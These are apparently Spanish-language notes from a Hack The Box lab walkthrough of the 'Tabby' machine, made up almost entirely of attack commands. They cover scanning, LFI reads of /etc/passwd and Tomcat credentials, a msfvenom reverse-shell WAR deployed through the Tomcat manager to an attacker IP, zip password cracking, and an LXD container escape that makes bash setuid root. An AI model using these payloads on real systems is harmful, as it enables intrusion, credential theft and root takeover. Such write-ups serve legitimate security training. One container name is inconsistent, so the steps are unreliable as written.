echo "10.129.23.72 tabby.htb" | sudo tee -a /etc/hosts
nmap -A -p- -oA output 10.129.23.72 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA mirai 10.129.23.72
nmap -sU -O -p- -oA mirai-udp 10.129.23.72 [[nmap_udp_scan]]
nikto -h 10.129.23.72:80
gobuster dir -u http://10.129.23.72 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 40 -o scans/gobuster-root-
med
Vemos el enlace para news es diferente
Agrego esa ip a etc/hosts
10.129.23.72 megahosting.htb
Vamos a ver si podemos hacer un ataque de LFI. Es decir cuando una aplicacion usa un archivo como parametro introducido por el usuario. Vamos agregar
../../../../../etc/passwd
al URL.
https://github.com/swisskyrepo/PayloadsAllTheThings
curl http://megahosting.htb/news.php?file=../../../../etc/tomcat9/tomcat-users.xml
curl http://megahosting.htb/news.php?file=../../../../etc/tomcat9/tomcat-users.xml
Esto se usa para eoan Ubuntu
curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.129.23.72:8080/manager/text/list
Tiene acceso a manager-script y podemos ver la lista http://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#Supported_Manager_Commands
msfvenom -p java/shell_reverse_tcp lhost=10.10.14.125 lport=443 -f war -o rev.10.10.14.125-443.war
Ahora le hacemos un deploy con curl
curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.129.23.72:8080/manager/text/deploy?path=/cu3rv0x --upload-file rev.10.10.14.125-443.war
-u 'tomcat:$3cureP4s5w0rd123!'
- las credenciales/manager/text/deploy
- el path para el comandodeploy
?path=/cu3rv0x
- el path donde uno quiere que viva la aplicacion--upload-file rev.10.10.14.125-443.war
- archivo war donde quiero subir con los commandos HTTP PUT
http://megahosting.htb:8080/cu3rv0x
rlwrap nc -lvnp 443
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl z
stty raw -echo
fg
export TERM=xterm
Vemos que news.php sube archivos en el directorio de files
Trato de hacerle un unzip a backup.zip pero no lo logre
crear un servidor en la maquina en la cual estoy atacando python3 -m http.server 8888
wget http://10.129.23.72:8888/16162020_backup.zip
Bajar el archivo en mi maquina de kali
Usar fcrackzip para conseguir la contrasena
fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
unzip 16162020_backup.zip
su - ash
Password: admin@it
Creamos un contenedor de lxc
cd /opt
git clone https://github.com/saghul/lxd-alpine-builder.git
https://github.com/saghul/lxd-alpine-builder
Para que en verdad funcione esto tuve que hacer lo siguiente cd lxd-alpine-builder sudo ./build-alpine si te sale un error de rootfs sudo mkdir rootfs/usr/share/alpine-mirrors sudo vim rootfs/usr/share/alpine-mirrors/MIRRORS.txt copiar la lista encontrada aqui http://dl-cdn.alpinelinux.org/alpine/MIRRORS.txt
crear un servidor en python python3 -m http.server 7777
cd /dev/shm
wget 10.10.14.125/alpine-v3.13-x86_64-20210411_1036.tar.gz
lxc image import /dev/shm/alpine-v3.13-x86_64-20210411_1036.tar.gz --alias cu3rv0x-image
lxd init
lxc init cu3rv0x-image container-cu3rv0x -c security.privileged=true
lxc config device add container-cu3rv0x device-cu3rv0x disk source=/ path=/mnt/root
Creamos un contenedor con las siguientes opciones:
init
- inicidando el contenedorcu3rv0x-image
- imagen ha empezarcontainer-cu3rv0x
- alias del contenedor-c security.privileged=true
- con esto podemos correr el contenedor como root
lxc list
lxc start container-cu3rv0x
lxc list
lxc exec container-0xdf /bin/sh
cd /mnt/root
cd /mnt/root/usr/bin chmod 4755 bash
exit
whoami
bash -p